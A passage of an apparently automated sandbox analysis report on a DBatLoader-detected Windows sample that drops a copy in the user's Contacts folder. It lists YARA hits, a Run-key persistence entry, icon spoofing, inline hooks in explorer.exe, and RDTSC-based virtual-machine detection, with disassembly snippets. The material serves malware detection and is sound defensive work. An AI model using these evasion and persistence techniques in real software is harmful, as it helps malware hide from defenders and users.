                Source: Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp

                Data Obfuscation:

                barindex
                Yara detected DBatLoaderShow sources
                Source: Yara matchFile source: WZ454554.exe, type: SAMPLE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.321956986.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.360667337.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.322739212.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.417791279.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.322356028.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.363228459.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.417110071.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.395638954.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.558403513.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.398461439.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.397793786.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.283008845.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.415275359.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.397308343.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.342065760.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.362225116.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.361296807.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\Contacts\Hyrzbcwcas.exe, type: DROPPED
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D976 push dword ptr [4B077C1Dh]; ret 9_2_0041DA7F
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00417103 pushfd ; retf 9_2_0041711E
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_004169FE push eax; retf 9_2_004169FF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D4E2 push eax; ret 9_2_0041D4E8
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D4EB push eax; ret 9_2_0041D552
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D495 push eax; ret 9_2_0041D4E8
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D54C push eax; ret 9_2_0041D552
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B0D0D1 push ecx; ret 9_2_00B0D0E4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D976 push dword ptr [4B077C1Dh]; ret 17_2_0041DA7F
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00417103 pushfd ; retf 17_2_0041711E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_004169FE push eax; retf 17_2_004169FF
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D4E2 push eax; ret 17_2_0041D4E8
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D4EB push eax; ret 17_2_0041D552
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D495 push eax; ret 17_2_0041D4E8
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D54C push eax; ret 17_2_0041D552
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00ABD0D1 push ecx; ret 17_2_00ABD0E4
                Source: C:\Users\user\Desktop\WZ454554.exeFile created: C:\Users\user\Contacts\Hyrzbcwcas.exeJump to dropped file
                Source: C:\Users\user\Desktop\WZ454554.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HyrzbcwcasJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HyrzbcwcasJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon306.png
                Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xE3
                Source: C:\Windows\SysWOW64\help.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Users\user\Desktop\WZ454554.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\WZ454554.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002B19904 second address: 0000000002B1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002B19B7E second address: 0000000002B19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000003009904 second address: 000000000300990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000003009B7E second address: 0000000003009B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002AD9904 second address: 0000000002AD990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002AD9B7E second address: 0000000002AD9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\explorer.exe TID: 2952Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeAPI coverage: 8.1 %
                Source: C:\Users\user\Desktop\WZ454554.exeProcess information queried: ProcessInformationJump to behavior
                Source: explorer.exe, 0000000A.00000000.365791216.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.372898871.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.380728239.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                Source: explorer.exe, 0000000A.00000000.330482298.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.335749563.0000000008957000.00000004.00000001.sdmpBinary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                Source: explorer.exe, 0000000A.00000000.330482298.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                Source: explorer.exe, 0000000A.00000000.354514242.0000000008957000.00000004.00000001.sdmpBinary or memory string: 2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                Source: explorer.exe, 0000000A.00000000.360107925.000000000EF2A000.00000004.00000001.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
                Source: C:\Users\user\Desktop\WZ454554.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF90AF mov eax, dword ptr fs:[00000030h]9_2_00AF90AF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A0 mov eax, dword ptr fs:[00000030h]9_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]9_2_00AEF0BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEF0BF mov eax, dword ptr fs:[00000030h]9_2_00AEF0BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEF0BF mov eax, dword ptr fs:[00000030h]9_2_00AEF0BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9080 mov eax, dword ptr fs:[00000030h]9_2_00AB9080
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B33884 mov eax, dword ptr fs:[00000030h]9_2_00B33884
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B33884 mov eax, dword ptr fs:[00000030h]9_2_00B33884
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB58EC mov eax, dword ptr fs:[00000030h]9_2_00AB58EC
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]9_2_00ADB8E4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]9_2_00ADB8E4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB40E1 mov eax, dword ptr fs:[00000030h]9_2_00AB40E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB40E1 mov eax, dword ptr fs:[00000030h]9_2_00AB40E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB40E1 mov eax, dword ptr fs:[00000030h]9_2_00AB40E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]9_2_00B4B8D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE002D mov eax, dword ptr fs:[00000030h]9_2_00AE002D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE002D mov eax, dword ptr fs:[00000030h]9_2_00AE002D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE002D mov eax, dword ptr fs:[00000030h]9_2_00AE002D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE002D mov eax, dword ptr fs:[00000030h]9_2_00AE002D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE002D mov eax, dword ptr fs:[00000030h]9_2_00AE002D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACB02A mov eax, dword ptr fs:[00000030h]9_2_00ACB02A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACB02A mov eax, dword ptr fs:[00000030h]9_2_00ACB02A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACB02A mov eax, dword ptr fs:[00000030h]9_2_00ACB02A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACB02A mov eax, dword ptr fs:[00000030h]9_2_00ACB02A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA830 mov eax, dword ptr fs:[00000030h]9_2_00ADA830
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA830 mov eax, dword ptr fs:[00000030h]9_2_00ADA830
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA830 mov eax, dword ptr fs:[00000030h]9_2_00ADA830
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA830 mov eax, dword ptr fs:[00000030h]9_2_00ADA830
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B37016 mov eax, dword ptr fs:[00000030h]9_2_00B37016
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B37016 mov eax, dword ptr fs:[00000030h]9_2_00B37016
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B37016 mov eax, dword ptr fs:[00000030h]9_2_00B37016
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B84015 mov eax, dword ptr fs:[00000030h]9_2_00B84015
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B84015 mov eax, dword ptr fs:[00000030h]9_2_00B84015
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B72073 mov eax, dword ptr fs:[00000030h]9_2_00B72073
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B81074 mov eax, dword ptr fs:[00000030h]9_2_00B81074
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD0050 mov eax, dword ptr fs:[00000030h]9_2_00AD0050
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD0050 mov eax, dword ptr fs:[00000030h]9_2_00AD0050
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B351BE mov eax, dword ptr fs:[00000030h]9_2_00B351BE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B351BE mov eax, dword ptr fs:[00000030h]9_2_00B351BE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B351BE mov eax, dword ptr fs:[00000030h]9_2_00B351BE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B351BE mov eax, dword ptr fs:[00000030h]9_2_00B351BE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE61A0 mov eax, dword ptr fs:[00000030h]9_2_00AE61A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE61A0 mov eax, dword ptr fs:[00000030h]9_2_00AE61A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov eax, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov eax, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov eax, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov ecx, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF mov eax, dword ptr fs:[00000030h]9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B749A4 mov eax, dword ptr fs:[00000030h]9_2_00B749A4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B749A4 mov eax, dword ptr fs:[00000030h]9_2_00B749A4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B749A4 mov eax, dword ptr fs:[00000030h]9_2_00B749A4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B749A4 mov eax, dword ptr fs:[00000030h]9_2_00B749A4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B369A6 mov eax, dword ptr fs:[00000030h]9_2_00B369A6
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEA185 mov eax, dword ptr fs:[00000030h]9_2_00AEA185
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADC182 mov eax, dword ptr fs:[00000030h]9_2_00ADC182
